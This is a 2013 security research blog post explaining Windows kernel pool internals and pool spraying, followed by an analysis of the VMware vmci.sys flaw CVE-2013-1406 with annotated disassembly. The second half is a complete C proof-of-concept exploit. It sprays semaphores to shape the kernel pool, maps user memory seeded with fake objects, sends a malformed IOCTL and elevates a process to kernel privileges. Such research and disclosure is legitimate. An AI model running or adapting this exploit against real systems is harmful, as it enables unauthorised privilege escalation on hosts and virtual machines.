
Wednesday, March 6, 2013

Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406

If you deal with Windows kernel vulnerabilities, you will likely have to deal with the kernel pool in order to develop an exploit, so it is useful to learn how to keep the behavior of this kernel entity under your control.

In this article I will try to give a high-level overview of kernel pool internals. This subject has already been researched in depth several times, so if you need more technical information, please google it or use the references at the end of this article.

Kernel pool structure overview
The kernel pool is the common place for allocating memory in the operating system kernel. Remember that stacks in the kernel environment are very small, suitable only for a small bunch of local non-array variables. Once a driver needs to create a large data structure or a string, it will almost certainly use pool memory.

There are different types of pools, but all of them share the same structure (except for the driver verifier's special pool). Every pool has a special control structure called a pool descriptor. Among other purposes, it maintains lists of free pool chunks, which represent the free pool space. The pool itself consists of memory pages, which can be standard (4 KB) or large (1 MB) in size. The number of pages used for the pool is adjusted dynamically.

Kernel pool pages are then split into chunks. These are the exact chunks that drivers are given when requesting memory from the pool.


Pool chunk on x86 systems

Pool chunks carry the following meta-information:

1. Previous size — the size of the preceding chunk.

2. Pool index is used in situations where there is more than one pool of a certain type. For example, there are multiple paged pools in the system, and this field identifies which paged pool the chunk belongs to.

3. Block size is the size of the current chunk. Just like the previous size field, it is encoded as (pool chunk data size + size of pool header + optional 4 bytes for a pointer to the quota-charged process) >> 3 (or >> 4 on x64 systems).

4. Pool type is a flag bitmask for the current chunk. Notice that these flags are not officially documented.

  • T (Tracked): this chunk is tracked by the driver verifier. Pool tracking is used for debugging purposes.
  • S (Session): the chunk belongs to the paged session pool, a special pool used for session-specific allocations.
  • Q (Quota): the chunk takes part in the quota management mechanism. This flag is only relevant for 32-bit systems. If it is set, a pointer to the process charged for this chunk is stored at the end of the chunk.
  • U (In use): the chunk is currently in use. Conversely, a chunk can be free, which means that memory can be allocated from it. This flag is the third bit on pre-Vista systems and the second bit on Vista and later.
  • B (Base pool) identifies which base pool the chunk belongs to. There are two base pools: paged and non-paged. Non-paged is encoded as 0 and paged as 1. On pre-Vista systems this flag could occupy two bits, because the base pool type was encoded as (base pool type + 1), that is binary 10 for the paged pool and 1 for the non-paged pool.

5. Pool tag is used for debugging purposes. Drivers specify a four-character signature that identifies the subsystem or driver using the chunk. For example, the “NtFs” tag means that the chunk belongs to the ntfs.sys driver.

Pool chunk on x64 systems

There are a couple of differences on 64-bit systems. The first is a different size for the header fields, and the second is a new 8-byte field holding a pointer to the process charged for this chunk.

Kernel pool memory allocation overview
Imagine that the pool is empty, that is, there is no pool space at all. If we try to allocate memory from the pool (say, less than 0xFF0 bytes), the allocator will first allocate a memory page and then place a chunk of the requested size on it. Since this is the first allocation on the page, the chunk will be placed at the start of the page.


The first pool chunk allocation sequence

The page now holds two pool chunks: the one we allocated and a free one. The free chunk can be used for subsequent allocations. But from this moment on, the pool allocator tends to place new chunks at the end of the page or of the free space within the page.


Pool chunk allocation strategy

When the chunks are deallocated, the process is repeated in reverse order: the chunks become free, and adjacent free chunks are merged.


Pool deallocation strategy

The whole situation with empty pools is just a fantasy, of course, because the pools are already charged with memory pages by the time we can actually use them.

Controlling the behavior of chunk allocations
Let’s keep in mind the fact that the kernel pool is a heavily used object. First of all, it is used for creating all sorts of kernel objects and private kernel and driver structures. Secondly, the kernel pool takes part in a number of system calls, providing a buffer for the corresponding parameters. Since the computer is constantly servicing hardware by means of drivers and software by means of system calls, you can imagine the rate of kernel pool usage even when the system is idle.

Sooner or later the kernel pool becomes fragmented, because allocations and frees of different sizes follow in arbitrary order. This is the origin of the term “spraying”: when sequentially allocating pool chunks, those chunks do not necessarily follow each other; they are most likely located at completely different places in memory. So, when filling the pool memory with controlled red-painted chunks, we are likely to see the left side of the picture rather than the right one.


Heap spraying leads to the left picture, not the right one

But there is an important circumstance relevant to exploitation: when there is no black region left for painting, we’ll get a new black region without strangers’ spots. From this point our spray becomes an ordinary brush with a solid color fill, and we gain a considerable level of control over the behavior of chunk allocation and the picture of the pool. We say considerable because we are still not guaranteed to be the painting master: our painting process can be interrupted by someone else spilling a different color.


The spraying becomes filling when using a lot of objects

Depending on the type of object we use for spraying, we are able to create free windows of the needed size by freeing a number of the objects we created before. And the most important fact that allows us to make a controlled allocation is that the pool allocator tends to be as fast as possible. In order to use the processor cache effectively, the last freed pool chunk will be the first one allocated! This is the essence of controlled allocation, because we can guess the address of the chunk about to be allocated.

Of course, the size of the allocation matters. That’s why we have to calculate the size of the free chunk window. If we have to allocate a 0x315-byte chunk and we are spraying 0x20-byte chunks, we have to free 0x315 / 0x20 = (0x18 + 1) = 0x19 chunks, rounding up. I hope this is clear enough.

Here are some points we need to consider in order to be successful in kernel pool spraying:

1. If you don’t have an opportunity to allocate kernel pool memory with some sort of target driver, you can always use Windows objects as spraying objects. Since Windows objects are naturally objects of the operating system kernel, they are stored in kernel pools.

  • For non-paged pool you can use processes, threads, events, semaphores, mutexes etc. 
  • For paged pool you can use directory objects, key objects, section objects (also known as file mapping) etc. 
  • For session pool you can use any GDI or USER object: palettes, DCs, brushes etc.

In order to free the memory occupied by those objects, you can simply close all open handles to them.

2. By the time we start spraying, there are pages available for pool usage, but they are too fragmented. If we need a space filled sequentially with controlled chunks, we need to spam the pool until there is no room left on the currently available pages. After that we’ll get new clean pages, giving us a chance at sequential allocation of controlled chunks. In a nutshell: create lots of spraying objects.

3. When calculating the necessary window size, keep in mind that the chunk header size matters, and that the whole size is rounded up to a multiple of 8 bytes on x86 machines and 16 bytes on x64 machines.

4. Although we are able to control the manner of allocation of the pool chunks, it is difficult to predict the relative positions of the sprayed objects. If you use Windows objects for spraying, thus having only the handle of an object but not its address, you can leak the kernel object addresses using the NtQuerySystemInformation() function with the SystemExtendedHandleInformation class. It will provide all the information needed for precise spraying.

5. Keep the quantity of sprayed objects balanced. You’ll probably fail to control the chunk allocation when there is no memory left in the system at all.

6. One of the tricks that might help you improve the reliability of kernel pool based exploits is assigning a high priority to the spraying and triggering thread. Since there is a race for pool memory, it is useful to tilt the sharing of the pool in your favor by having more chances to execute than the other threads in the system. This helps keep your spraying consistent. Also consider the gap between spraying and triggering the vulnerability: the smaller it is, the better the chance you land on a controlled pool chunk.

VMware CVE 2013-1406
A couple of weeks ago an interesting advisory by VMware was published. It promised local privilege escalation on both host and guest systems, thus leading to a double ownage.

The vulnerable component was vmci.sys. VMCI stands for Virtual Machine Communication Interface. It is used for fast and efficient communication between guest virtual machines and their host server. VMCI presents a custom socket type implemented as a Windows Socket Service Provider in the vsocklib.dll library. The vmci.sys module creates a virtual device that implements the needed functionality. This driver is always running on the host system. As for guest systems, VMware Tools have to be installed in order to use VMCI.

When writing an overview, it would be nice to explain the high-level logic of the vulnerability in order to present a detective-like story. Unfortunately this is not the case here, because there is not much public information about the VMCI implementation. I don’t think that people who exploit vulnerabilities always go deep into the details of reverse engineering the whole target system. At the least, obtaining a stable working exploit within a week is more profitable than gaining high-level knowledge of how things work over months.

PatchDiff highlighted three patched functions. All of them were relevant to the same IOCTL code 0x8103208C: something went terribly wrong with handling it.




Control flow of the code processing the 0x8103208C IOCTL


The third patched function was eventually called from both the first and the second. It is supposed to allocate a pool chunk of a requested size times 0x68 and initialize it with zeroes. This chunk contained an internal structure for dispatching the request. The problem was that the chunk size was specified in a user buffer for this IOCTL code and was not checked properly. As a result, the internal structure was not allocated, which led to interesting consequences.

A buffer is supplied for this IOCTL; its size is supposed to be 0x624 in order to reach the patched functions. To process the user request, an internal structure of size 0x20C is allocated. Its first four bytes are filled with a value specified at [user_buffer + 0x10]. These exact bytes are used to allocate another internal structure, a pointer to which is then stored in the last four bytes of the first one. But no matter whether the second chunk was allocated or not, a sort of dispatch function was invoked.

.text:0001B2B4     ; int __stdcall DispatchChunk(PVOID pChunk)
.text:0001B2B4     DispatchChunk   proc near               ; CODE XREF: PatchedOne+78
.text:0001B2B4                                             ; UnsafeCallToPatchedThree+121
.text:0001B2B4
.text:0001B2B4     pChunk          = dword ptr  8
.text:0001B2B4
.text:0001B2B4 000                 mov     edi, edi
.text:0001B2B6 000                 push    ebp
.text:0001B2B7 004                 mov     ebp, esp
.text:0001B2B9 004                 push    ebx
.text:0001B2BA 008                 push    esi
.text:0001B2BB 00C                 mov     esi, [ebp+pChunk]
.text:0001B2BE 00C                 mov     eax, [esi+208h]
.text:0001B2C4 00C                 xor     ebx, ebx
.text:0001B2C6 00C                 cmp     eax, ebx
.text:0001B2C8 00C                 jz      short CheckNullUserSize
.text:0001B2CA 00C                 push    eax             ; P
.text:0001B2CB 010                 call    ProcessParam ; We won’t get here
.text:0001B2D0
.text:0001B2D0     CheckNullUserSize:                      ; CODE XREF: DispatchChunk+14
.text:0001B2D0 00C                 cmp     [esi], ebx
.text:0001B2D2 00C                 jbe     short CleanupAndRet
.text:0001B2D4 00C                 push    edi
.text:0001B2D5 010                 lea     edi, [esi+8]
.text:0001B2D8
.text:0001B2D8     ProcessUserBuff:                        ; CODE XREF: DispatchChunk+51
.text:0001B2D8 010                 mov     eax, [edi]
.text:0001B2DA 010                 test    eax, eax
.text:0001B2DC 010                 jz      short NextCycle
.text:0001B2DE 010                 or      ecx, 0FFFFFFFFh
.text:0001B2E1 010                 lea     edx, [eax+38h]
.text:0001B2E4 010                 lock xadd [edx], ecx
.text:0001B2E8 010                 cmp     ecx, 1
.text:0001B2EB 010                 jnz     short DerefObj
.text:0001B2ED 010                 push    eax
.text:0001B2EE 014                 call    UnsafeFire      ; BANG!!!!
.text:0001B2F3
.text:0001B2F3     DerefObj:                               ; CODE XREF: DispatchChunk+37
.text:0001B2F3 010                 mov     ecx, [edi+100h] ; Object
.text:0001B2F9 010                 call    ds:ObfDereferenceObject
.text:0001B2FF
.text:0001B2FF     NextCycle:                              ; CODE XREF: DispatchChunk+28
.text:0001B2FF 010                 inc     ebx
.text:0001B300 010                 add     edi, 4
.text:0001B303 010                 cmp     ebx, [esi]
.text:0001B305 010                 jb      short ProcessUserBuff
.text:0001B307 010                 pop     edi
.text:0001B308
.text:0001B308     CleanupAndRet:                          ; CODE XREF: DispatchChunk+1E
.text:0001B308 00C                 push    20Ch            ; size_t
.text:0001B30D 010                 push    esi             ; void *
.text:0001B30E 014                 call    ZeroChunk
.text:0001B313 00C                 push    'gksv'          ; Tag
.text:0001B318 010                 push    esi             ; P
.text:0001B319 014                 call    ds:ExFreePoolWithTag
.text:0001B31F 00C                 pop     esi
.text:0001B320 008                 pop     ebx
.text:0001B321 004                 pop     ebp
.text:0001B322 000                 retn    4
.text:0001B322     DispatchChunk   endp
The dispatch function walks the chunk looking for pointers to process. The processing includes dereferencing some object and calling some function if an appropriate flag is set inside the pointed-to structure. But since we had failed to allocate a structure to process, the dispatch function slid beyond the end of the first chunk. When uncontrolled, this leads to an access violation and a subsequent BSOD.

IOCTL dispatch structure and the dispatcher behavior 

So we’ve got a possible code execution at the controlled address:
.text:0001B946     UnsafeFire      proc near            
.text:0001B946                                          
.text:0001B946
.text:0001B946     arg_0           = dword ptr  8
.text:0001B946
.text:0001B946 000                 mov     edi, edi
.text:0001B948 000                 push    ebp
.text:0001B949 004                 mov     ebp, esp
.text:0001B94B 004                 mov     eax, [ebp+arg_0]
.text:0001B94E 004                 push    eax
.text:0001B94F 008                 call    dword ptr [eax+0ACh] ; BANG!!!!
.text:0001B955 004                 pop     ebp
.text:0001B956 000                 retn    4
.text:0001B956     UnsafeFire      endp
Exploitation
Since the chunk dispatch code slips beyond the chunk it is supposed to process, it meets either a neighboring chunk or an unmapped page. If it falls into unmapped memory, a BSOD occurs. But when it meets another pool chunk, it tries to process that chunk’s pool header, interpreting it as a pointer.

Consider an x86 system. The four bytes the dispatch function tries to interpret as a pointer are the previous block size, the pool index, the current block size and the pool type flags. Since we know the size and the pool index used for the skipped chunk, we know the low word of the pointer:

0xXXXX0043, where 0x43 is the encoded size of the skipped chunk, which thus becomes the previous size field of the neighboring chunk, and 0x0 is the pool index, which is guaranteed to be 0, since the non-paged pool used for the skipped chunk is the only one in the system. Notice that if two adjacent chunks share the same pool page, they belong to the same pool type and index.

The high word contains the block size, which we can’t predict, and the pool type flags, which we can:

B = 0 because the chunk is from the non-paged pool,
U = 1 because the chunk is supposed to be in use,
Q = 0/1 because the chunk might be quota-charged,
S = 0 because the pool is not the session one,
T = 0 because pool tracking is likely to be disabled by default.

The unused bits in the pool type field are equal to 0.

So we’ve got the following memory windows valid for Windows 7 and Windows 8:
  1. 0x04000000 – 0x06000000 for ordinary chunks
  2. 0x14000000 – 0x16000000 for quoted chunks
Based on the provided information you can easily calculate memory windows for Windows XP and alike.

As you can see, those memory ranges belong to user space, so we are able to force the vulnerable dispatch function to execute shellcode that we provide. In order to achieve arbitrary code execution, we have to map the calculated regions and meet the requirements of the dispatch function:

1. At [0x43 + 0x38], place a DWORD value of 1 in order to meet the requirements of the following code:
.text:0001B2E1 010                 lea     edx, [eax+38h]
.text:0001B2E4 010                 lock xadd [edx], ecx
.text:0001B2E8 010                 cmp     ecx, 1
2. At [0x43 + 0xAC], place a pointer to the function to be called, or simply the address of the shellcode.

3. At [0x43 + 0x100], place a pointer to a fake object to be dereferenced by the ObfDereferenceObject() function. Notice that the reference count is taken from the object header, which is located at a negative offset from the object itself, so make sure this function is not going to land on an unmapped region. Also provide a suitable reference count so that ObfDereferenceObject() will not try to free the user-mode memory with functions that are not suited for that.

4. Repeat this pattern every 0x10000 bytes.

Everything has been done right!

Improving reliability of an exploit
Although we have developed a nice exploitation strategy, it is still unreliable. Consider the case when the chunk after the vulnerable one is free. It is difficult to guess the state of that chunk’s fields. That means that although such a chunk forms a pointer valid for the dispatch function (because it is not NULL), dispatching it will lead to a BSOD. The same is true for the case when the dispatch function slides into an unmapped virtual address.

Kernel pool spraying is very useful in this case. As the spraying object I chose semaphores, since they provide the closest chunk size to the one I needed. This technique helped a lot in improving the stability of the exploit.

Remember that Windows 8 has SMEP support, so it is a little more complicated to exploit, depending on the laziness of the shellcode developer. Writing base-independent code and bypassing SMEP is left as an exercise for the reader.

As for x64 systems, the problem is that the pointer becomes 8 bytes in size. This means that the high DWORD of the pointer interpreted by the dispatch function falls on the pool chunk tag field. Since most drivers and kernel subsystems use ASCII symbols for tagging, the pointer falls into non-canonical address space, so it can’t be used for exploitation. So far I have been unable to find a solution to this problem.

In the end
I hope this article was useful for you, and I’m sorry that I could not fit all the needed information into a couple of paragraphs. I wish you good luck in researching and exploiting for the sake of making things more secure.

Source Code:
/*
    CVE-2013-1406 exploitation PoC
    by Artem Shishkin,
    Positive Research,
    Positive Technologies,
    02-2013
*/

void __stdcall FireShell(DWORD dwSomeParam)
{
    EscalatePrivileges(hProcessToElevate);
    // Equate the stack and quit the cycle
#ifndef _AMD64_
    __asm
    {
        pop ebx
        pop edi
        push 0xFFFFFFF8
        push 0xA010043
    }
#endif
}


HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0)
{
    HANDLE            hResult = 0;
    DWORD            dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr))
        {
            hResult = pHandleTable->Handles[i].HandleValue;
            break;
        }
    }

    return hResult;
}

PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
    PVOID    pResult = 0;
    DWORD    dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pResult = (HANDLE)pHandleTable->Handles[i].Object;
            break;
        }
    }

    return pResult;
}

void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
    DWORD    dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pHandleTable->Handles[i].Object = NULL;
            pHandleTable->Handles[i].HandleValue = NULL;
            break;
        }
    }

    return;
}

void PoolSpray()
{
    // Init used native API function
    lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (NtQuerySystemInformation == NULL)
    {
        printf("Such a fail...\n");
        return;
    }
    
    // Determine object size
    // xp: 
    //const DWORD_PTR dwSemaphoreSize = 0x38;
    // 7:
    //const DWORD_PTR dwSemaphoreSize = 0x48;

    DWORD_PTR dwSemaphoreSize = 0;

    if (LOBYTE(GetVersion()) == 5)
    {
        dwSemaphoreSize = 0x38;
    }
    else if (LOBYTE(GetVersion()) == 6)
    {
        dwSemaphoreSize = 0x48;
    }

    unsigned int cycleCount = 0;
    while (cycleCount < 50000)
    {
        HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
        if (hTemp == NULL)
        {
            break;
        }

        ++cycleCount;
    }

    printf("\t[+] Spawned lots of semaphores\n");

    printf("\t[.] Initing pool windows\n");
    Sleep(2000);

    DWORD dwNeeded = 4096;
    NTSTATUS status = 0xFFFFFFFF;
    PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);

    while (true)
    {
        status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL);
        if (status != STATUS_SUCCESS)
        {
            dwNeeded *= 2;
            VirtualFree(pBuf, 0, MEM_RELEASE);
            pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
        }
        else
        {
            break;
        }
    };

    HANDLE hHandlesToClose[0x30] = {0};
    DWORD dwCurPID = GetCurrentProcessId();
    PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;

    for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID)
        {
            DWORD_PTR    dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
            DWORD_PTR    dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
            DWORD_PTR    dwWindowAddress = 0;
            bool        bPoolWindowFound = false;

            UINT iObjectsNeeded = 0;
            // Needed window size is vmci packet pool chunk size (0x218) divided by
            // Semaphore pool chunk size (dwSemaphoreSize)
            iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);
        
            if (
                    // Not on a page boundary
                    ((dwTestObjAddr & 0xFFF) != 0) 
                    && 
                    // Doesn't cross page boundary
                    (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) 
                )
            {
                // Check previous object for being our semaphore
                DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
                if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL)
                {
                    continue;
                }

                for (unsigned int j = 1; j < iObjectsNeeded; j++)
                {
                    DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
                    HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);

                    //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
                    //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
                    //printf("\tLooked up handle = %08X\n", hLookedUp);

                    if (hLookedUp != NULL)
                    {
                        hHandlesToClose[j] = hLookedUp;

                        if (j == iObjectsNeeded - 1)
                        {
                            // Now test the following object
                            dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
                            if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL)
                            {
                                hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
                                bPoolWindowFound = true;

                                dwWindowAddress = dwTestObjAddr;

                                // Close handles to create a memory window
                                for (int k = 0; k < iObjectsNeeded; k++)
                                {
                                    if (hHandlesToClose[k] != NULL)
                                    {
                                        CloseHandle(hHandlesToClose[k]);
                                        CloseTableHandle(pHandleTable, hHandlesToClose[k]);
                                    }
                                }
                            }
                            else
                            {
                                memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                                break;
                            }
                        }
                    }
                    else
                    {
                        memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                        break;
                    }
                }

                if (bPoolWindowFound)
                {
                    printf("\t[+] Window found at %08X!\n", dwWindowAddress);
                }

            }
        }
    }

    VirtualFree(pBuf, 0, MEM_RELEASE);

    return;
}

void InitFakeBuf(PVOID pBuf, DWORD dwSize)
{
    if (pBuf != NULL)
    {
        RtlFillMemory(pBuf, dwSize, 0x11);
    }

    return;
}

void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
{
    /*
        Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043
        So, for every 0xXXXX0043 address we must suffice the following conditions:

        lea        edx, [eax+38h]
        lock    xadd [edx], ecx
        cmp        ecx, 1

        Some sort of lock at [addr + 38] must be equal to 1. And

        call    dword ptr [eax+0ACh]

        The call site is located at [addr + 0xAC]

        Also fake the object to be dereferenced at [addr + 0x100]
    */

    if (pBuf != NULL)
    {
        for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep)
        {
            PDWORD pLock = (PDWORD)(iAddr + 0x38);
            PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
            PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);

            *pLock = 1;
            *pCallMeMayBe = (DWORD_PTR)FireShell;
            *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
        }
    }

    return;
}

void PenetrateVMCI()
{
    /*

        VMware Security Advisory
        Advisory ID:    VMSA-2013-0002
        Synopsis:    VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability
        Issue date:    2013-02-07
        Updated on:    2013-02-07 (initial advisory)
        CVE numbers:    CVE-2013-1406

    */

    DWORD dwPidToElevate = 0;
    HANDLE hSuspThread = NULL;

    bool bXP = (LOBYTE(GetVersion()) == 5);
    bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
    bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));

    if (!InitKernelFuncs())
    {
        printf("[-] Like I don't know where the shellcode functions are\n");
        return;
    }

    if (bXP)
    {
        printf("[?] Who do we want to elevate?\n");
        scanf_s("%d", &dwPidToElevate);

        hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
        if (hProcessToElevate == NULL)
        {
            printf("[-] This process doesn't want to be elevated\n");
            return;
        }
    }

    if (b7 || b8)
    {
        // We are unable to change an active process token on-the-fly,
        // so we create a custom shell suspended (Ionescu hack)
        STARTUPINFO si = {0};
        PROCESS_INFORMATION pi = {0};

        si.wShowWindow = TRUE;

        WCHAR cmdPath[MAX_PATH] = {0};
        GetSystemDirectory(cmdPath, MAX_PATH);
        wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");

        if (CreateProcess(cmdPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE)
        {
            hProcessToElevate = pi.hProcess;
            hSuspThread = pi.hThread;
        }
    }

    HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
    if (hVMCIDevice != INVALID_HANDLE_VALUE)
    {
        UCHAR BadBuff[0x624] = {0};
        UCHAR retBuf[0x624] = {0};
        DWORD dwRet = 0;

        printf("[+] VMCI service found running\n");

        PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
        pVmReq->Header.RequestSize = 0xFFFFFFF0;
        
        PVOID pShellSprayBufStd = NULL;
        PVOID pShellSprayBufQtd = NULL;
        PVOID pShellSprayBufStd7 = NULL;
        PVOID pShellSprayBufQtd7 = NULL;
        PVOID pShellSprayBufChk8 = NULL;

        if ((b7) || (bXP) || (b8))
        {
            /*
                Significant bits of a PoolType of a chunk define the following regions:
                0x0A000000 - 0x0BFFFFFF - Standard chunk
                0x1A000000 - 0x1BFFFFFF - Quoted chunk
                0x0 - 0xFFFFFFFF - Free chunk - no idea

                Addon for Windows 7:
                Since PoolType flags have changed, and "In use flag" is now 0x2,
                define an additional region for Win7:

                0x04000000 - 0x06000000 - Standard chunk
                0x14000000 - 0x16000000 - Quoted chunk
            */
            
            pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

            if ((pShellSprayBufStd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufStd7 == NULL) || (pShellSprayBufQtd7 == NULL))
            {
                printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
                CloseHandle(hVMCIDevice);
                return;
            }

            InitFakeBuf(pShellSprayBufStd, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd, 0x2000000);
            InitFakeBuf(pShellSprayBufStd7, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd7, 0x2000000);

            PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);

            if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE)
            {
                SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
            }

            PoolSpray();

            if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE)
            {
                printf("\t[!] If you don't see any BSOD, you're successful\n");

                if (b7 || b8)
                {
                    ResumeThread(hSuspThread);
                }
            }
            else
            {
                printf("[-] Not this time %d\n", GetLastError());
            }

            if (pShellSprayBufStd != NULL)
            {
                VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
            }

            if (pShellSprayBufQtd != NULL)
            {
                VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
            }

            if (pShellSprayBufStd7 != NULL)
            {
                VirtualFree(pShellSprayBufStd7, 0, MEM_RELEASE);
            }

            if (pShellSprayBufQtd7 != NULL)
            {
                VirtualFree(pShellSprayBufQtd7, 0, MEM_RELEASE);
            }
        }

        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

        CloseHandle(hVMCIDevice);
    }
    else
    {
        printf("[-] Like I don't see vmware here\n");
    }

    CloseHandle(hProcessToElevate);

    return;
}
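The VirtualAlloc bases above mirror the regions listed in the in-code comment: when pool-header bytes are misinterpreted by the kernel as a pointer, the PoolType bits end up in the high-order byte of the value, so the bogus pointer can only land in a few narrow user-mode ranges, which the exploit maps and seeds with fake objects in advance. A hedged sketch of that mapping (enum and helper names are mine, not from the exploit):

```c
#include <stdint.h>

/* Which pre-sprayed user-mode region a bogus "pointer" built from
   pool-header bytes would fall into (ranges from the comment above). */
typedef enum {
    REGION_NONE = 0,
    REGION_STD_XP,   /* 0x0A000000 - 0x0BFFFFFF, standard chunks (XP/Vista) */
    REGION_QTD_XP,   /* 0x1A000000 - 0x1BFFFFFF, quoted chunks  (XP/Vista) */
    REGION_STD_7,    /* 0x04000000 - 0x06000000, Win7 standard chunks      */
    REGION_QTD_7     /* 0x14000000 - 0x16000000, Win7 quoted chunks        */
} SprayRegion;

static SprayRegion RegionFor(uint32_t fakePtr)
{
    if (fakePtr >= 0x0A000000 && fakePtr <= 0x0BFFFFFF) return REGION_STD_XP;
    if (fakePtr >= 0x1A000000 && fakePtr <= 0x1BFFFFFF) return REGION_QTD_XP;
    if (fakePtr >= 0x04000000 && fakePtr <= 0x05FFFFFF) return REGION_STD_7;
    if (fakePtr >= 0x14000000 && fakePtr <= 0x15FFFFFF) return REGION_QTD_7;
    return REGION_NONE;
}
```

Because every byte of those 32 MB ranges is mapped and stamped with fake objects, any header-derived value whose top byte matches one of the regions dereferences cleanly, which is what makes the "stars align" without knowing the exact pool addresses.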
References
